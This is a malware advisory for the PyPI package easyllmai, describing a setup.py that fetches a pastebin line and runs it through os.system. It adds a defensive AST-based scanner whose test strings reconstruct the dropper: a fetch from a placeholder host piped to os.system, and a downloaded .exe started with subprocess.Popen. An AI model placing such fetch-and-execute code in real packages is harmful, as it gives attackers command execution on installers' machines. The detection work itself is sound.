Malicious code in easyllmai (PyPI)
MAL-2026-5766
Published · Modified
Description
Source: amazon-inspector (4589bbb71e0bb3589a162bf2102bba5e8bf7124d3988235647d1e3c1d01821d0)
During pip install, setup.py performs an unauthenticated HTTP fetch of https://pastebin.com/raw/yBcUM1QB, takes the first line of the response, and passes it directly to os.system(f'cmd /c "{cmd_pastebin}"'). The remote content is hosted on an anonymous, mutable, attacker-controlled paste with no pinning, no hash check, and no signature verification. Whoever controls the paste obtains arbitrary command execution on every installer's machine at install time. This is a canonical install-time dropper pattern: lifecycle-time outbound fetch from an unverified source piped straight into the OS shell.
Source: kam193 (b7ac8db348471011dee14fad41b2d0a487f08463c10c678625fe8184e8088e0a)
During installation, the code attempts to download and start a malicious executable.
Likely related to 2025-08-raknet-testing-package.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-easyaillm
Reasons (based on the campaign):
Downloads and executes a remote executable.
obfuscation
malware
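Both sources describe the same install-time dropper shape: a network fetch inside setup.py whose result ends up in os.system, a subprocess spawn, or a "start the downloaded executable" call. That shape can be checked statically before a source distribution is ever built. The script below is an added example, not code from this advisory, from amazon-inspector or from kam193: it parses a setup.py with Python's ast module, marks every name assigned from a network call as tainted, propagates taint through later assignments (including f-strings and tuple unpacking), and reports any shell or process call whose arguments reach tainted data. The three setup.py samples are constructed with placeholder URLs, and the allow-lists of network and exec calls are assumptions of this example (aliased imports such as `import urllib.request as u` are not resolved).

```python
"""Static check for the install-time dropper pattern: a network fetch in
setup.py whose result flows into a shell or process-spawning call.
Added example; not code from the advisory or from either listed source."""
import ast
from typing import List, NamedTuple, Set

# Calls whose result is treated as untrusted remote content (assumed list).
NETWORK_CALLS = {
    "urllib.request.urlopen", "urlopen",
    "urllib.request.urlretrieve", "urlretrieve",
    "requests.get", "requests.post",
}
# Calls that hand a string or path to the OS shell, spawn a process,
# or evaluate a string as code (assumed list).
EXEC_CALLS = {
    "os.system", "os.popen", "os.startfile", "os.execv", "os.execvp",
    "subprocess.run", "subprocess.call", "subprocess.check_call",
    "subprocess.check_output", "subprocess.Popen", "exec", "eval",
}


class Finding(NamedTuple):
    lineno: int
    kind: str      # "network-fetch" or "remote-to-exec"
    detail: str


def dotted_name(node: ast.AST):
    """Return 'a.b.c' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _names(node: ast.AST) -> Set[str]:
    """Every bare identifier referenced anywhere inside a subtree."""
    return {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}


def _calls(node: ast.AST) -> Set[str]:
    """Dotted names of every call inside a subtree (unnamed callees dropped)."""
    return {dotted_name(n.func) for n in ast.walk(node)
            if isinstance(n, ast.Call)} - {None}


def scan_setup_py(source: str) -> List[Finding]:
    tree = ast.parse(source)
    assigns = [n for n in ast.walk(tree)
               if isinstance(n, (ast.Assign, ast.AnnAssign, ast.AugAssign))]
    # Taint: names assigned from a network call, or from anything already
    # tainted. Iterate to a fixed point so source order does not matter.
    tainted: Set[str] = set()
    changed = True
    while changed:
        changed = False
        for a in assigns:
            if a.value is None:
                continue
            if _calls(a.value) & NETWORK_CALLS or _names(a.value) & tainted:
                targets = a.targets if isinstance(a, ast.Assign) else [a.target]
                for t in targets:
                    new = _names(t) - tainted
                    if new:
                        tainted |= new
                        changed = True
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        if name in NETWORK_CALLS:
            # Any outbound fetch during packaging is worth a look on its own.
            findings.append(Finding(node.lineno, "network-fetch", name))
        elif name in EXEC_CALLS:
            payload = node.args + [k.value for k in node.keywords]
            reaches = {n for p in payload for n in _names(p)} & tainted
            direct = {c for p in payload for c in _calls(p)} & NETWORK_CALLS
            if reaches or direct:
                findings.append(Finding(node.lineno, "remote-to-exec",
                                        f"{name} receives {sorted(reaches | direct)}"))
    return sorted(findings)


# Constructed samples (placeholder URLs, not the advisory's indicators).
BENIGN_SETUP_PY = """\
from setuptools import setup
setup(name="example-pkg", version="0.0.0")
"""
# Shape from the amazon-inspector description: fetch, take first line, shell it.
DROPPER_SETUP_PY = """\
import os, urllib.request
from setuptools import setup
resp = urllib.request.urlopen("https://paste.example.invalid/raw/PLACEHOLDER")
first_line = resp.read().decode().splitlines()[0]
os.system(f'cmd /c "{first_line}"')
setup(name="example-pkg", version="0.0.0")
"""
# Shape from the kam193 description: download an executable and start it.
DOWNLOADER_SETUP_PY = """\
import subprocess
from urllib.request import urlretrieve
from setuptools import setup
path, _ = urlretrieve("https://cdn.example.invalid/PLACEHOLDER.exe", "helper.exe")
subprocess.Popen([path])
setup(name="example-pkg", version="0.0.0")
"""

if __name__ == "__main__":
    for label, src in [("benign", BENIGN_SETUP_PY),
                       ("dropper", DROPPER_SETUP_PY),
                       ("downloader", DOWNLOADER_SETUP_PY)]:
        print(label, scan_setup_py(src) or "clean")
```

A practical place to run this is a dependency-review step that pulls source distributions with `pip download --no-binary :all: --no-deps <package>` and scans each `setup.py` before anything is installed; installing with `pip install --only-binary=:all:` avoids executing setup.py at all. The check is deliberately narrow: a dropper that hides the fetch or the command behind base64 or string concatenation (the advisory lists obfuscation as a reason) will not match the name-based taint here, so treat `exec`/`eval` or encoded blobs in a packaging script as their own signal.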
References
- EVIDENCE https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection
- EVIDENCE https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection
- EVIDENCE https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25
- WEB https://bad-packages.kam193.eu/pypi/package/easyllmai
- PACKAGE https://pypi.org/project/easyllmai/2.21/